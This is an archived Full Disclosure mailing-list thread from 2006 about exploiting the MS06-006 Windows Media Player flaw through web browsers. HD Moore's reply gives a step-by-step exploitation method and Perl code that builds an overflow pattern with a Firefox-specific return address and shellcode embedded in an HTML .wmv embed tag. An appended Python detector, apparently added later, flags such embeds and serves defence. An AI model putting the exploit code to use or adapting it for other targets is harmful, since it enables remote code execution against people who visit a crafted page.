Full Disclosure mailing list archives

Re: MS06-06 Windows Media Player Exploitation


From: H D Moore <fdlist () digitaloffense net>
Date: Thu, 16 Feb 2006 17:23:23 -0600

Still getting some annoying crashes (SEH trick in alphanum code is 
annoying when you are trying to debug something...), but the basic 
solution is:

1) Use alphanumeric shellcode
2) Use a return address that does not have bytes over 0x7F
3) Use a pop/pop/ret and hop over return w/o restricted bytes

my $pattern   = Pex::Text::PatternCreate(16384);
substr($pattern, 2086, 4, pack('V', 0x60082336)); # pop ebx, pop ebp, ret
substr($pattern, 2082, 4, "ABC="); # inc, inc, inc, cmp eax, [ptr]
substr($pattern, 2090, length($shellcode), $shellcode);
$content   = "<html><body><embed src=\"$pattern.wmv\"></body></html>";

Return address is from js3250.dll in Firefox 1.5.0.1, you should 
auto-target based on the browser version.

-HD

On Thursday 16 February 2006 16:26, c0ntex wrote:
No exploit, just some basic research - anyone with 100% Ascii win32
shellcode?

http://open-security.org/winmedia/index.html

--

regards
c0ntex
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
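A defender-side check suggested by the HTML line in the post above, added here as an example and not code from HD Moore's or c0ntex's post: it parses a page for <embed> tags and flags .wmv references whose filename is oversized or carries a Metasploit-style cyclic pattern (the "Aa0Aa1Aa2..." output of PatternCreate). The 260-byte length threshold and the eight-triplet run length are assumptions chosen for this example, and the sample HTML is constructed.

```python
import re
import string
from html.parser import HTMLParser
from typing import List, Tuple

MAX_SRC_LEN = 260          # assumption: no legitimate media filename is longer than this
CYCLIC_RE = re.compile(r'(?:[A-Z][a-z][0-9]){8,}')  # run of Metasploit-style cyclic triplets


class EmbedCollector(HTMLParser):
    """Collect src attribute values from <embed> tags."""

    def __init__(self) -> None:
        super().__init__()
        self.sources: List[str] = []

    def handle_starttag(self, tag, attrs) -> None:
        if tag == 'embed':
            for name, value in attrs:
                if name == 'src' and value:
                    self.sources.append(value)


def flag_embeds(html: str) -> List[Tuple[str, str]]:
    """Return (reason, truncated src) for each suspicious .wmv embed in the page."""
    parser = EmbedCollector()
    parser.feed(html)
    findings = []
    for src in parser.sources:
        if not src.lower().endswith('.wmv'):
            continue
        if len(src) > MAX_SRC_LEN:
            findings.append(('oversized media src (%d bytes)' % len(src), src[:24] + '...'))
        elif CYCLIC_RE.search(src):
            findings.append(('cyclic fuzzing pattern in src', src[:24] + '...'))
    return findings


def cyclic_pattern(length: int) -> str:
    """Constructed stand-in for Pex::Text::PatternCreate: Aa0Aa1...Ab0Ab1... truncated to length."""
    out = []
    for a in string.ascii_uppercase:
        for b in string.ascii_lowercase:
            for c in string.digits:
                out.append(a + b + c)
                if len(out) * 3 >= length:
                    return ''.join(out)[:length]
    return ''.join(out)[:length]


# Constructed samples: a benign page and one shaped like the post's <embed src="$pattern.wmv">.
BENIGN_HTML = '<html><body><embed src="intro.wmv"></body></html>'
SUSPECT_HTML = '<html><body><embed src="%s.wmv"></body></html>' % cyclic_pattern(16384)
```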

